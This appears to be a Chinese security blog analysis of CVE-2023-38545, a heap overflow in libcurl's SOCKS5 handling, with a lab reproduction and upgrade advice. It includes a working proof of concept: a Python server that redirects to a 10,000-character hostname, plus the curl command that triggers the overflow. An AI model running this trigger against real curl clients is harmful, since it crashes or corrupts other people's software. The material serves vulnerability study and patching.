CVE-2023-38545漏洞分析：Libcurl Socks5 堆缓冲溢出漏洞分析

2023-10-17 15:23:55

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

[curl](https://github.com/curl/curl/releases) 是一个命令行工具，用于通过各种网络协议获取或发送数据，如 HTTP、FTP 和 SMTP。常用于网络开发和测试。libcurl 是一个免费且易于使用的客户端URL传输库，支持多种协议，如 HTTP、FTP。它提供了API供开发者在各种应用中实现网络通信功能。

![1697527016_652e34e8ea559914cce3c.png?1697527018292](https://image.3001.net/images/20231017/1697527016_652e34e8ea559914cce3c.png?1697527018292)

漏洞描述
----

该漏洞主要成因是在使用 SOCKS5 代理链接过程中造成的堆溢出。当 Curl 使用 SOCKS5 代理以便它解析地址时，主机名的最大长度为 255 字节，如果检测到主机名超过 255 字节，Curl 将切换到本地主机解析地址，并将解析后的地址传递给代理。然而，由于程序 bug，在建立延迟较高的 SOCKS5 链接过程中，此时主机解析地址可能会获取错误的值，此时会把过长的主机名也复制到缓冲区中。

受该漏洞影响的libcurl版本范围：7.69.0（包含）至8.3.0（包含）

漏洞复现
----

### 环境搭建

1\. 搭建socks5服务器，这里我使用的是ubuntu，使用命令安装danted server，

sudo apt update && sudo apt -y install dante-server

等待安装完成后，修改配置文件，

logoutput: syslog
user.privileged: root
user.unprivileged: nobody
# The listening network interface or address.
internal: 0.0.0.0 port=10808
# The proxying network interface or address.
external: ens160     
# socks-rules determine what is proxied through the external interface.
socksmethod: none #有none关健字则支持匿名用户使用代理，不做认证
# client-rules determine who can connect to the internal interface.
clientmethod: none
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}

启动danted server

systemctl (status/stop/start) danted.service         

2.安装curl，linux会自带curl，首先使用命令 curl --version 检查当前版本，若不在受漏洞影响版本范围内，写在当前版本，这里我复现使用[8.3.0版本的curl](https://github.com/curl/curl/releases)。下载好后编译安装

tar -zxf curl-8.3.0.tar.gz
cd curl-8.3.0
./configure --prefix=/usr/local/curl  --without-ssl
sudo make
sudo make install
chmod 755 -R /usr/local/curl
chmod 755 /usr/bin/curl
mv /usr/bin/curl{,.bak20231017}
cp /usr/local/curl/bin/curl /usr/bin/curl
cp /etc/profile{,.bak20231017}
echo "export PATH=\\$PATH:/usr/local/curl/bin" >> /etc/profile
source /etc/profile

安装完成之后，使用 curl --version 检查版本。

### 漏洞利用

1.在socks5服务器上开启socks5服务（192.168.1.1），

![1697526281_652e32091349383f425f2.png?1697526282721](https://image.3001.net/images/20231017/1697526281_652e32091349383f425f2.png?1697526282721)

2\. 在socks5服务器上编辑提供访问的恶意文件server.py，并启动。

from http.server import BaseHTTPRequestHandler, HTTPServer

class RequestHandler(BaseHTTPRequestHandler):
    def do\_GET(self):
        # 301重定向到超长的URL
        self.send\_response(301)
        new\_url = 'http://' + 'A' \* 10000
        self.send\_header('Location', new\_url)
        self.end\_headers()

def run(server\_class=HTTPServer, handler\_class=RequestHandler):
    server\_address = ('192.168.1.1', 8000)                             # socks5代理服务器ip
    httpd = server\_class(server\_address, handler\_class)
    print('Starting httpd...')
    httpd.serve\_forever()

run()

![1697526582_652e3336182352657c868.png?1697526583502](https://image.3001.net/images/20231017/1697526582_652e3336182352657c868.png?1697526583502)

3\. 在存在漏洞的curl服务器上执行payload，此时造成溢出。

curl -v --limit-rate 256  --proxy socks5h://192.168.1.1:10808 -L http://192.168.1.1:8000

![1697526920_652e34884e4e3e7a9c893.png?1697526921859](https://image.3001.net/images/20231017/1697526920_652e34884e4e3e7a9c893.png?1697526921859)

修复建议
----

*   禁止使用存在漏洞版本的curl客户端或libcurl库连接不信任的socks代理服务器
*   升级到最新版本8.4.0  
    

\# 漏洞 \# 渗透测试 \# web安全